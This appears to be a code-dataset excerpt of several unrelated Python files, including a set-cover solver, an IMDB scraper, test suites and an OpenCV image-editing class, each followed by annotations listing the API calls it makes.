ok_module_info("astropy")
except:
error_module_info("astropy")
load_module_ok = False
try:
from astroquery.jplhorizons import Horizons
ok_module_info("astroquery")
except:
error_module_info("astroquery")
load_module_ok = False
if not load_module_ok:
print("Niestety, wystąpiły błędy.")
print("Nie mogę dalej działać.")
exit(0)
# Teraz mamy zainstalowane wszystkie moduły
print("Super! Możemy działać.")
|
[
"sys.exit"
] |
[((853, 860), 'sys.exit', 'exit', (['(0)'], {}), '(0)\n', (857, 860), False, 'from sys import exit\n')]
|
#!/usr/bin/env python
# encoding: utf-8
from collections import defaultdict
from cp_estimator import Estimator
class State(object):
def __init__(self, estimator, set2items, item2sets,
parent=None, picked_set=None, decision=None):
# Don't use this constructor directly. Use .from_task() instead
self.estimator = estimator # just copy the pointer from the parent for fast access
self.set2items = set2items # {set_index: set(indexes of not covered items)}
self.item2sets = item2sets # {item_index: set(indexes of sets that can cover the item and have no decision yet)}
self.parent = parent # parent state object
self.picked_set = picked_set # picked set index
self.decision = decision # whether we build picked_set or not
self.is_feasible = True
if decision:
self.chosen_sets = {picked_set}
else:
self.chosen_sets = set()
self.propagate_constaints()
if self.is_feasible:
self.recalc_cost()
def recalc_cost(self):
additional = self.estimator.cost_of_chosen_list(self.chosen_sets)
if self.parent is None:
self.current_cost = additional
else:
self.current_cost = self.parent.current_cost + additional
@classmethod
def from_task(cls, task):
# Make initial state
estimator = Estimator(task)
set2items = {s.index: set(s.items) for s in task.sets}
item2sets = defaultdict(set)
for set_idx, set_items in set2items.iteritems():
for item_idx in set_items:
item2sets[item_idx].add(set_idx)
return cls(estimator, set2items, dict(item2sets),
parent=None, picked_set=None, decision=False)
def __repr__(self):
return 'State(picked={},chosen={})'.format(self.picked_set, self.decision)
# Search
def next_child(self):
picked_set = self.estimator.pick_a_set(self)
return self.create_child(picked_set, decision=True)
def create_child(self, picked_set, decision):
set2items = {s: i.copy() for s, i in self.set2items.iteritems()} # Copy for mutating in child state
item2sets = {i: s.copy() for i, s in self.item2sets.iteritems()} # TODO: Copy is expensive. Can we avoid it?
return self.__class__(self.estimator, set2items, item2sets,
parent=self, picked_set=picked_set, decision=decision)
def negate(self):
# Generate sibling state, where picked_set is not chosen
# If we already there, rollback to the parent state and repeat on it
state = self
while state:
if state.decision:
return state.parent.create_child(state.picked_set, decision=False)
else:
state = state.parent
return None # if we have eventually got stat = None, it means that we are reached initial state
# Constraints propagation
def propagate_constaints(self):
if self.decision:
self.propagate_on_choice()
else:
self.propagate_on_toss()
def propagate_on_choice(self):
self.on_sets_chosen(self.chosen_sets) # there is only one set in chosen_sets (picked_set)
def propagate_on_toss(self):
if self.picked_set is not None: # "if we are not at the init state"
orphaned_items = self.set2items.pop(self.picked_set)
for item_idx in orphaned_items:
sets = self.item2sets[item_idx]
sets.remove(self.picked_set)
if not sets:
self.is_feasible = False
# We can't cover the item.
# No matter, what else. State doesn't lead to any feasible solutions
return
# before = len(self.set2items)
# self.remove_expensive_subsets(orphaned_items, # Too expensive calculations :o(
# self.estimator.cost_of_chosen(self.picked_set))
# after = len(self.set2items)
# if after != before:
# self.estimator.metrics['cut_exp'] += 1
# else:
# self.estimator.metrics['not_cut_exp'] += 1
# if not self.is_feasible:
# self.estimator.metrics['rollback_exp'] += 1
# return
# Immediately set 1 for every set that can't be replaced with another set
required_sets = self.detect_required_sets()
self.chosen_sets.update(required_sets)
self.on_sets_chosen(required_sets)
def detect_required_sets(self):
required_sets = set()
for item, sets in self.item2sets.iteritems():
if len(sets) == 1: # only one set can cover this item
required_sets.update(sets)
return required_sets
def on_items_covered(self, to_remove):
overvalued_sets = set()
for item in to_remove:
overvalued_sets.update(self.item2sets.pop(item))
for s in overvalued_sets & set(self.set2items):
items = self.set2items[s]
items -= to_remove
if not items:
del self.set2items[s]
#before = len(self.set2items)
#self.remove_redundant_sets(overvalued_sets & set(self.set2items)) # expensive operation. Work good only on the large datasets
#after = len(self.set2items)
#if after < before:
# print 'profit {}->{}'.format(before, after)
def remove_expensive_subsets(self, items, cost_limit):
# We can cover items with the cost=cost_limit
# But we don't do that. So, we don't want to cover the items with the more expensive sets
costs = self.estimator.set_costs
iter_items = iter(items)
candidates = list(self.item2sets[next(iter_items)])
for cand_idx in candidates:
if costs[cand_idx] >= cost_limit:
cand_items = self.set2items[cand_idx]
if len(cand_items) <= len(items) and cand_items <= items:
del self.set2items[cand_idx]
for item_idx in cand_items:
sets = self.item2sets[item_idx]
sets.remove(cand_idx)
if not sets:
self.is_feasible = False
return # We cant cover the item
def on_sets_chosen(self, sets):
covered_items = set()
for s in sets:
covered_items.update(self.set2items.pop(s))
self.on_items_covered(covered_items)
# Getting info
def is_all_covered(self):
return not self.item2sets
def get_optimistic_cost(self):
return self.estimator.get_optimistic(self)
if __name__ == '__main__':
from reader import read_input
from time import time as now
state = State.from_task(read_input('sc_15_0'))
# st = now()
# state.remove_redundant_sets()
# print now() - st
|
[
"collections.defaultdict",
"cp_estimator.Estimator",
"reader.read_input"
] |
[((1415, 1430), 'cp_estimator.Estimator', 'Estimator', (['task'], {}), '(task)\n', (1424, 1430), False, 'from cp_estimator import Estimator\n'), ((1515, 1531), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (1526, 1531), False, 'from collections import defaultdict\n'), ((6950, 6971), 'reader.read_input', 'read_input', (['"""sc_15_0"""'], {}), "('sc_15_0')\n", (6960, 6971), False, 'from reader import read_input\n')]
|
"""Test suite for Beta Diversity display module."""
from app.display_modules.beta_div import BetaDiversityDisplayModule
from app.display_modules.beta_div.models import BetaDiversityResult
from app.display_modules.beta_div import MODULE_NAME
from app.display_modules.display_module_base_test import BaseDisplayModuleTest
from app.tool_results.beta_diversity.models import BetaDiversityToolResult
from app.tool_results.beta_diversity.tests.factory import create_ranks
from tests.utils import add_sample_group
from .factory import BetaDiversityFactory
class TestBetaDivModule(BaseDisplayModuleTest):
"""Test suite for Beta Diversity diplay module."""
def test_add_beta_div(self):
"""Ensure Beta Diversity model is created correctly."""
ranks = create_ranks()
beta_div_result = BetaDiversityResult(data=ranks)
self.generic_adder_test(beta_div_result, MODULE_NAME)
def test_get_beta_div(self):
"""Ensure getting a single Beta Diversity behaves correctly."""
beta_div_result = BetaDiversityFactory()
self.generic_getter_test(beta_div_result, MODULE_NAME,
verify_fields=('data',))
def test_run_beta_div_sample_group(self): # pylint: disable=invalid-name
"""Ensure Beta Diversity run_sample_group produces correct results."""
def create_sample_group():
"""Create unique sample for index i."""
sample_group = add_sample_group(name='SampleGroup01')
ranks = create_ranks()
BetaDiversityToolResult(sample_group_uuid=sample_group.id, data=ranks).save()
return sample_group
self.generic_run_group_test(None,
BetaDiversityDisplayModule,
group_builder=create_sample_group)
|
[
"app.display_modules.beta_div.models.BetaDiversityResult",
"tests.utils.add_sample_group",
"app.tool_results.beta_diversity.tests.factory.create_ranks",
"app.tool_results.beta_diversity.models.BetaDiversityToolResult"
] |
[((772, 786), 'app.tool_results.beta_diversity.tests.factory.create_ranks', 'create_ranks', ([], {}), '()\n', (784, 786), False, 'from app.tool_results.beta_diversity.tests.factory import create_ranks\n'), ((813, 844), 'app.display_modules.beta_div.models.BetaDiversityResult', 'BetaDiversityResult', ([], {'data': 'ranks'}), '(data=ranks)\n', (832, 844), False, 'from app.display_modules.beta_div.models import BetaDiversityResult\n'), ((1456, 1494), 'tests.utils.add_sample_group', 'add_sample_group', ([], {'name': '"""SampleGroup01"""'}), "(name='SampleGroup01')\n", (1472, 1494), False, 'from tests.utils import add_sample_group\n'), ((1515, 1529), 'app.tool_results.beta_diversity.tests.factory.create_ranks', 'create_ranks', ([], {}), '()\n', (1527, 1529), False, 'from app.tool_results.beta_diversity.tests.factory import create_ranks\n'), ((1542, 1612), 'app.tool_results.beta_diversity.models.BetaDiversityToolResult', 'BetaDiversityToolResult', ([], {'sample_group_uuid': 'sample_group.id', 'data': 'ranks'}), '(sample_group_uuid=sample_group.id, data=ranks)\n', (1565, 1612), False, 'from app.tool_results.beta_diversity.models import BetaDiversityToolResult\n')]
|
import requests,pprint,json
from bs4 import BeautifulSoup
url=requests.get("https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in")
soup=BeautifulSoup(url.text,"lxml")
def scrape_top_list():
tbody= soup.find("tbody",class_="lister-list")
all_movies=[]
for tr in tbody.find_all("tr"):
dic={}
dic["ratting"]=float(tr.find("td",class_="ratingColumn imdbRating").text)
for td in tr.find_all("td",class_="titleColumn"):
nam=""
dic["Url"]="https://www.imdb.com/"+td.find("a")["href"][:16]
nyp=[]
for letter in td.text:
nam+=letter
if letter=="\n":
nyp.append(nam.strip())
nam=""
dic["position"]=int(nyp[1][:-1])
dic["nam"] = str(nyp[2])
dic["year"]=int(nyp[3][1:-1])
all_movies.append(dic)
with open("movies.json","w") as file:
data=json.dumps(all_movies)
file.write(data)
return all_movies
# pprint.pprint(scrape_top_list())
|
[
"bs4.BeautifulSoup",
"requests.get",
"json.dumps"
] |
[((62, 152), 'requests.get', 'requests.get', (['"""https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in"""'], {}), "(\n 'https://www.imdb.com/india/top-rated-indian-movies/?ref_=nv_mv_250_in')\n", (74, 152), False, 'import requests, pprint, json\n'), ((153, 184), 'bs4.BeautifulSoup', 'BeautifulSoup', (['url.text', '"""lxml"""'], {}), "(url.text, 'lxml')\n", (166, 184), False, 'from bs4 import BeautifulSoup\n'), ((816, 838), 'json.dumps', 'json.dumps', (['all_movies'], {}), '(all_movies)\n', (826, 838), False, 'import requests, pprint, json\n')]
|
# -*- coding: utf-8 -*-
import jsonschema
import sys
def clean_doc(doc):
"""
Clean given JSON document from keys where its value is None
:param doc: Pure, dirty JSON
:return: Cleaned JSON document
"""
for key, value in list(doc.items()):
if value is None:
del doc[key]
elif isinstance(value, dict):
clean_doc(value)
return doc
def is_valid(doc, schema):
"""
Checks if given doc is valid against given schema
:param doc: to be validated JSON
:param schema: base JSON
:return: a boolean result and error
"""
try:
jsonschema.validate(doc, schema)
sys.stdout.write("OK\n")
return True, None
except jsonschema.exceptions.ValidationError as val_err:
sys.stderr.write("FAIL\n")
return False, val_err
|
[
"jsonschema.validate",
"sys.stdout.write",
"sys.stderr.write"
] |
[((620, 652), 'jsonschema.validate', 'jsonschema.validate', (['doc', 'schema'], {}), '(doc, schema)\n', (639, 652), False, 'import jsonschema\n'), ((661, 685), 'sys.stdout.write', 'sys.stdout.write', (['"""OK\n"""'], {}), "('OK\\n')\n", (677, 685), False, 'import sys\n'), ((782, 808), 'sys.stderr.write', 'sys.stderr.write', (['"""FAIL\n"""'], {}), "('FAIL\\n')\n", (798, 808), False, 'import sys\n')]
|
import os
import json
cwd=os.getcwd()
weighted_graph_dict={}
stop_dict = {}
off_stop_dict={}
with open(cwd+'/WeightedGraph','r')as f:
line = True
while line:
line = f.readline()
if line:
data = json.loads(line)
weighted_graph_dict = data
exception_dict={}
with open(cwd+'/RouteData','r')as f:
line=True
while line:
line=f.readline()
print(line)
if line:
data=json.loads(line)
print(data)
with open(cwd+'/TrainLog','r')as f:
line=True
while line:
line=f.readline()
if line:
data=json.loads(line)
if not data['id'] in off_stop_dict:
off_stop_dict.update({data['id']:data['name']})
if not data['name'] in off_stop_dict:
train=data['train']
off_stop_dict.update({data['name']:{}})
elif len(data['train'])>0:
train=data['train']
if not train['id'] in off_stop_dict[data['name']]:
off_stop_dict[data['name']].update({train['id']:{}})
else:
stop=off_stop_dict[data['name']]
loc_train=stop[train['id']]
loc_train.update({data['time']:{'stop_list':train['stop_list'],'stop_index':train['stop_index']}})
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
# with open(cwd + '/External/test', 'w')as f1:
# json.dump(off_stop_dict,f1)
# print("+++++++++++++++++++++++++++++++++++++++++++++++++++")
print(off_stop_dict['Bank'])
for stuff in off_stop_dict:
if off_stop_dict[stuff]=='Waterloo':
print(stuff)
"""
structure of data produced:
{
id:{
name: "full-name"
trips:{
money: "money-left"
trip_time: "hours-min-sec"
trip_cost: "cost"
trip_taken: "loctionA-locationB"
transits: [station1,station2,station3]
arrival_time: "time"
trains_taken: {
train Id:
{
Time: {
stop_list:[1,2,3]
stop_index: index
}
}
}
}
}
"""
"""
structure of dictionary:
{data
stopId:"stationName",
stopId2:"stationName2",
station_name: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
station_name2: {
Train Id: {
Time1{
stop_list[n1,n2,n3]
stop_index: ind
}
}
},
}
"""
|
[
"os.getcwd",
"json.loads"
] |
[((26, 37), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (35, 37), False, 'import os\n'), ((231, 247), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (241, 247), False, 'import json\n'), ((453, 469), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (463, 469), False, 'import json\n'), ((616, 632), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (626, 632), False, 'import json\n')]
|
# Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited
import numpy as np
import cv2
from scipy import ndimage
import math
from copy import deepcopy
class Images:
def __init__(self, img):
self.img = cv2.imread(img, 1)
if self.img.shape[0] / self.img.shape[1] < 0.76:
self.img_width = 1100
self.img_height = int(self.img_width * self.img.shape[0] / self.img.shape[1])
else:
self.img_height = 700
self.img_width = int(self.img_height * self.img.shape[1] / self.img.shape[0])
self.img = cv2.resize(self.img, (self.img_width, self.img_height))
self.img_copy = deepcopy(self.img)
self.grand_img_copy = deepcopy(self.img)
self.img_name = img.split('\\')[-1].split(".")[0]
self.img_format = img.split('\\')[-1].split(".")[1]
self.left, self.right, self.top, self.bottom = None, None, None, None
# self.bypass_censorship()
def auto_contrast(self):
clip_hist_percent = 20
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
hist = cv2.calcHist([gray], [0], None, [256], [0, 256])
hist_size = len(hist)
accumulator = [float(hist[0])]
for index in range(1, hist_size):
accumulator.append(accumulator[index - 1] + float(hist[index]))
maximum = accumulator[-1]
clip_hist_percent *= (maximum / 100.0)
clip_hist_percent /= 2.0
minimum_gray = 0
while accumulator[minimum_gray] < clip_hist_percent:
minimum_gray += 1
maximum_gray = hist_size - 1
while accumulator[maximum_gray] >= (maximum - clip_hist_percent):
maximum_gray -= 1
alpha = 255 / (maximum_gray - minimum_gray)
beta = -minimum_gray * alpha
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def auto_sharpen(self):
self.img = cv2.detailEnhance(self.img, sigma_s=10, sigma_r=0.3)
def auto_cartoon(self, style=0):
edges1 = cv2.bitwise_not(cv2.Canny(self.img, 100, 200))
gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
gray = cv2.medianBlur(gray, 5)
edges2 = cv2.adaptiveThreshold(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 7, 7)
dst = cv2.edgePreservingFilter(self.img, flags=2, sigma_s=64, sigma_r=0.25)
if not style:
# less blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges1)
else:
# more blurry
self.img = cv2.bitwise_and(dst, dst, mask=edges2)
def auto_invert(self):
self.img = cv2.bitwise_not(self.img)
def change_b_c(self, alpha=1, beta=0):
# contrast from 0 to 3, brightness from -100 to 100
self.img = cv2.convertScaleAbs(self.img, alpha=alpha, beta=beta)
def change_saturation(self, value):
# -300 to 300
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
(h, s, v) = cv2.split(img_hsv)
s += value
s = np.clip(s, 0, 255)
img_hsv = cv2.merge([h, s, v])
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def remove_color(self, color):
h = color.lstrip('#')
color = np.array([int(h[i:i + 2], 16) for i in (0, 2, 4)])
img_hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV).astype("float32")
low = np.array([color[0] - 15, 0, 20])
high = np.array([color[0] + 15, 255, 255])
mask = cv2.inRange(img_hsv, low, high)
img_hsv[mask > 0] = (0, 0, 255)
self.img = cv2.cvtColor(img_hsv.astype("uint8"), cv2.COLOR_HSV2BGR)
def crop_img(self, left, right, top, bottom):
self.img = self.img[left:right, top:bottom]
def rotate_img(self, angle, crop=False, flip=[False, False]):
self.reset(flip)
if not crop:
self.img = cv2.resize(self.img, (0, 0), fx=0.5, fy=0.5)
w, h = self.img.shape[1], self.img.shape[0]
else:
w, h = self.img_width, self.img_height
self.img = ndimage.rotate(self.img, angle)
angle = math.radians(angle)
quadrant = int(math.floor(angle / (math.pi / 2))) & 3
sign_alpha = angle if ((quadrant & 1) == 0) else math.pi - angle
alpha = (sign_alpha % math.pi + math.pi) % math.pi
bb_w = w * math.cos(alpha) + h * math.sin(alpha)
bb_h = w * math.sin(alpha) + h * math.cos(alpha)
gamma = math.atan2(bb_w, bb_w) if (w < h) else math.atan2(bb_w, bb_w)
delta = math.pi - alpha - gamma
length = h if (w < h) else w
d = length * math.cos(alpha)
a = d * math.sin(alpha) / math.sin(delta)
y = a * math.cos(gamma)
x = y * math.tan(gamma)
wr, hr = bb_w - 2 * x, bb_h - 2 * y
midpoint = (np.array(self.img.shape[:-1]) // 2)[::-1]
half_w, half_h = wr // 2, hr // 2
self.left, self.right, self.top, self.bottom = int(midpoint[0] - half_w), int(midpoint[0] + half_w), \
int(midpoint[1] - half_h), int(midpoint[1] + half_h)
def detect_face(self):
face_cascade = cv2.CascadeClassifier('data/haarcascade_frontalface_alt2.xml')
# eye_cascade = cv2.CascadeClassifier('data/haarcascade_eye.xml')
gray_scale_img = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)
face_coord = face_cascade.detectMultiScale(gray_scale_img)
return face_coord
def bypass_censorship(self):
width = self.img.shape[1]
height = self.img.shape[0]
smaller_img = cv2.resize(self.img, (width // 2, height // 2))
image = np.zeros(self.img.shape, np.uint8)
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
try:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2 + 1:, :width // 2] = smaller_img
image[height // 2 + 1:, width // 2:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2:] = smaller_img
except:
image[:height // 2, :width // 2] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[height // 2:, :width // 2] = smaller_img
image[height // 2:, width // 2 + 1:] = cv2.rotate(smaller_img, cv2.cv2.ROTATE_180)
image[:height // 2, width // 2 + 1:] = smaller_img
self.img = image
def save_img(self, file):
cv2.imwrite(file, self.img)
def reset(self, flip=None):
if flip is None:
flip = [False, False]
self.img = deepcopy(self.img_copy)
if flip[0]:
self.img = cv2.flip(self.img, 0)
if flip[1]:
self.img = cv2.flip(self.img, 1)
def grand_reset(self):
self.img = deepcopy(self.grand_img_copy)
self.img_copy = deepcopy(self.grand_img_copy)
def main():
path = "ppl.jpg"
img = Images(path)
img_name = path.split('\\')[-1].split(".")[0]
cv2.imshow(img_name, img.img)
cv2.waitKey()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
[
"cv2.bitwise_and",
"cv2.medianBlur",
"math.atan2",
"cv2.adaptiveThreshold",
"numpy.clip",
"cv2.edgePreservingFilter",
"cv2.imshow",
"cv2.inRange",
"cv2.cvtColor",
"math.radians",
"cv2.imwrite",
"cv2.detailEnhance",
"cv2.split",
"cv2.convertScaleAbs",
"math.cos",
"cv2.destroyAllWindows",
"cv2.resize",
"copy.deepcopy",
"cv2.Canny",
"cv2.bitwise_not",
"cv2.waitKey",
"cv2.calcHist",
"math.sin",
"cv2.flip",
"cv2.merge",
"cv2.rotate",
"math.tan",
"numpy.zeros",
"math.floor",
"cv2.imread",
"numpy.array",
"cv2.CascadeClassifier",
"scipy.ndimage.rotate"
] |
[((7505, 7534), 'cv2.imshow', 'cv2.imshow', (['img_name', 'img.img'], {}), '(img_name, img.img)\n', (7515, 7534), False, 'import cv2\n'), ((7540, 7553), 'cv2.waitKey', 'cv2.waitKey', ([], {}), '()\n', (7551, 7553), False, 'import cv2\n'), ((7559, 7582), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7580, 7582), False, 'import cv2\n'), ((251, 269), 'cv2.imread', 'cv2.imread', (['img', '(1)'], {}), '(img, 1)\n', (261, 269), False, 'import cv2\n'), ((617, 672), 'cv2.resize', 'cv2.resize', (['self.img', '(self.img_width, self.img_height)'], {}), '(self.img, (self.img_width, self.img_height))\n', (627, 672), False, 'import cv2\n'), ((698, 716), 'copy.deepcopy', 'deepcopy', (['self.img'], {}), '(self.img)\n', (706, 716), False, 'from copy import deepcopy\n'), ((748, 766), 'copy.deepcopy', 'deepcopy', (['self.img'], {}), '(self.img)\n', (756, 766), False, 'from copy import deepcopy\n'), ((1088, 1130), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (1100, 1130), False, 'import cv2\n'), ((1149, 1197), 'cv2.calcHist', 'cv2.calcHist', (['[gray]', '[0]', 'None', '[256]', '[0, 256]'], {}), '([gray], [0], None, [256], [0, 256])\n', (1161, 1197), False, 'import cv2\n'), ((1882, 1935), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['self.img'], {'alpha': 'alpha', 'beta': 'beta'}), '(self.img, alpha=alpha, beta=beta)\n', (1901, 1935), False, 'import cv2\n'), ((1987, 2039), 'cv2.detailEnhance', 'cv2.detailEnhance', (['self.img'], {'sigma_s': '(10)', 'sigma_r': '(0.3)'}), '(self.img, sigma_s=10, sigma_r=0.3)\n', (2004, 2039), False, 'import cv2\n'), ((2161, 2203), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (2173, 2203), False, 'import cv2\n'), ((2220, 2243), 'cv2.medianBlur', 'cv2.medianBlur', (['gray', '(5)'], {}), '(gray, 5)\n', (2234, 2243), False, 'import cv2\n'), ((2262, 2352), 'cv2.adaptiveThreshold', 'cv2.adaptiveThreshold', (['gray', '(255)', 'cv2.ADAPTIVE_THRESH_MEAN_C', 'cv2.THRESH_BINARY', '(7)', '(7)'], {}), '(gray, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.\n THRESH_BINARY, 7, 7)\n', (2283, 2352), False, 'import cv2\n'), ((2363, 2432), 'cv2.edgePreservingFilter', 'cv2.edgePreservingFilter', (['self.img'], {'flags': '(2)', 'sigma_s': '(64)', 'sigma_r': '(0.25)'}), '(self.img, flags=2, sigma_s=64, sigma_r=0.25)\n', (2387, 2432), False, 'import cv2\n'), ((2703, 2728), 'cv2.bitwise_not', 'cv2.bitwise_not', (['self.img'], {}), '(self.img)\n', (2718, 2728), False, 'import cv2\n'), ((2856, 2909), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['self.img'], {'alpha': 'alpha', 'beta': 'beta'}), '(self.img, alpha=alpha, beta=beta)\n', (2875, 2909), False, 'import cv2\n'), ((3076, 3094), 'cv2.split', 'cv2.split', (['img_hsv'], {}), '(img_hsv)\n', (3085, 3094), False, 'import cv2\n'), ((3128, 3146), 'numpy.clip', 'np.clip', (['s', '(0)', '(255)'], {}), '(s, 0, 255)\n', (3135, 3146), True, 'import numpy as np\n'), ((3166, 3186), 'cv2.merge', 'cv2.merge', (['[h, s, v]'], {}), '([h, s, v])\n', (3175, 3186), False, 'import cv2\n'), ((3497, 3529), 'numpy.array', 'np.array', (['[color[0] - 15, 0, 20]'], {}), '([color[0] - 15, 0, 20])\n', (3505, 3529), True, 'import numpy as np\n'), ((3546, 3581), 'numpy.array', 'np.array', (['[color[0] + 15, 255, 255]'], {}), '([color[0] + 15, 255, 255])\n', (3554, 3581), True, 'import numpy as np\n'), ((3598, 3629), 'cv2.inRange', 'cv2.inRange', (['img_hsv', 'low', 'high'], {}), '(img_hsv, low, high)\n', (3609, 3629), False, 'import cv2\n'), ((4186, 4217), 'scipy.ndimage.rotate', 'ndimage.rotate', (['self.img', 'angle'], {}), '(self.img, angle)\n', (4200, 4217), False, 'from scipy import ndimage\n'), ((4237, 4256), 'math.radians', 'math.radians', (['angle'], {}), '(angle)\n', (4249, 4256), False, 'import math\n'), ((5311, 5373), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""data/haarcascade_frontalface_alt2.xml"""'], {}), "('data/haarcascade_frontalface_alt2.xml')\n", (5332, 5373), False, 'import cv2\n'), ((5477, 5519), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2GRAY'], {}), '(self.img, cv2.COLOR_BGR2GRAY)\n', (5489, 5519), False, 'import cv2\n'), ((5747, 5794), 'cv2.resize', 'cv2.resize', (['self.img', '(width // 2, height // 2)'], {}), '(self.img, (width // 2, height // 2))\n', (5757, 5794), False, 'import cv2\n'), ((5812, 5846), 'numpy.zeros', 'np.zeros', (['self.img.shape', 'np.uint8'], {}), '(self.img.shape, np.uint8)\n', (5820, 5846), True, 'import numpy as np\n'), ((6947, 6974), 'cv2.imwrite', 'cv2.imwrite', (['file', 'self.img'], {}), '(file, self.img)\n', (6958, 6974), False, 'import cv2\n'), ((7091, 7114), 'copy.deepcopy', 'deepcopy', (['self.img_copy'], {}), '(self.img_copy)\n', (7099, 7114), False, 'from copy import deepcopy\n'), ((7299, 7328), 'copy.deepcopy', 'deepcopy', (['self.grand_img_copy'], {}), '(self.grand_img_copy)\n', (7307, 7328), False, 'from copy import deepcopy\n'), ((7354, 7383), 'copy.deepcopy', 'deepcopy', (['self.grand_img_copy'], {}), '(self.grand_img_copy)\n', (7362, 7383), False, 'from copy import deepcopy\n'), ((2114, 2143), 'cv2.Canny', 'cv2.Canny', (['self.img', '(100)', '(200)'], {}), '(self.img, 100, 200)\n', (2123, 2143), False, 'import cv2\n'), ((2509, 2547), 'cv2.bitwise_and', 'cv2.bitwise_and', (['dst', 'dst'], {'mask': 'edges1'}), '(dst, dst, mask=edges1)\n', (2524, 2547), False, 'import cv2\n'), ((2614, 2652), 'cv2.bitwise_and', 'cv2.bitwise_and', (['dst', 'dst'], {'mask': 'edges2'}), '(dst, dst, mask=edges2)\n', (2629, 2652), False, 'import cv2\n'), ((3995, 4039), 'cv2.resize', 'cv2.resize', (['self.img', '(0, 0)'], {'fx': '(0.5)', 'fy': '(0.5)'}), '(self.img, (0, 0), fx=0.5, fy=0.5)\n', (4005, 4039), False, 'import cv2\n'), ((4587, 4609), 'math.atan2', 'math.atan2', (['bb_w', 'bb_w'], {}), '(bb_w, bb_w)\n', (4597, 4609), False, 'import math\n'), ((4626, 4648), 'math.atan2', 'math.atan2', (['bb_w', 'bb_w'], {}), '(bb_w, bb_w)\n', (4636, 4648), False, 'import math\n'), ((4750, 4765), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4758, 4765), False, 'import math\n'), ((4801, 4816), 'math.sin', 'math.sin', (['delta'], {}), '(delta)\n', (4809, 4816), False, 'import math\n'), ((4834, 4849), 'math.cos', 'math.cos', (['gamma'], {}), '(gamma)\n', (4842, 4849), False, 'import math\n'), ((4867, 4882), 'math.tan', 'math.tan', (['gamma'], {}), '(gamma)\n', (4875, 4882), False, 'import math\n'), ((5911, 5954), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (5921, 5954), False, 'import cv2\n'), ((6063, 6106), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, cv2.cv2.ROTATE_180)\n', (6073, 6106), False, 'import cv2\n'), ((7160, 7181), 'cv2.flip', 'cv2.flip', (['self.img', '(0)'], {}), '(self.img, 0)\n', (7168, 7181), False, 'import cv2\n'), ((7227, 7248), 'cv2.flip', 'cv2.flip', (['self.img', '(1)'], {}), '(self.img, 1)\n', (7235, 7248), False, 'import cv2\n'), ((2995, 3036), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HSV'], {}), '(self.img, cv2.COLOR_BGR2HSV)\n', (3007, 3036), False, 'import cv2\n'), ((3422, 3463), 'cv2.cvtColor', 'cv2.cvtColor', (['self.img', 'cv2.COLOR_BGR2HSV'], {}), '(self.img, cv2.COLOR_BGR2HSV)\n', (3434, 3463), False, 'import cv2\n'), ((4281, 4314), 'math.floor', 'math.floor', (['(angle / (math.pi / 2))'], {}), '(angle / (math.pi / 2))\n', (4291, 4314), False, 'import math\n'), ((4474, 4489), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4482, 4489), False, 'import math\n'), ((4496, 4511), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4504, 4511), False, 'import math\n'), ((4532, 4547), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4540, 4547), False, 'import math\n'), ((4554, 4569), 'math.cos', 'math.cos', (['alpha'], {}), '(alpha)\n', (4562, 4569), False, 'import math\n'), ((4783, 4798), 'math.sin', 'math.sin', (['alpha'], {}), '(alpha)\n', (4791, 4798), False, 'import math\n'), ((4951, 4980), 'numpy.array', 'np.array', (['self.img.shape[:-1]'], {}), '(self.img.shape[:-1])\n', (4959, 4980), True, 'import numpy as np\n'), ((6254, 6297), 'cv2.rotate', 'cv2.rotate', (['smaller_img', 'cv2.cv2.ROTATE_180'], {}), '(smaller_img, 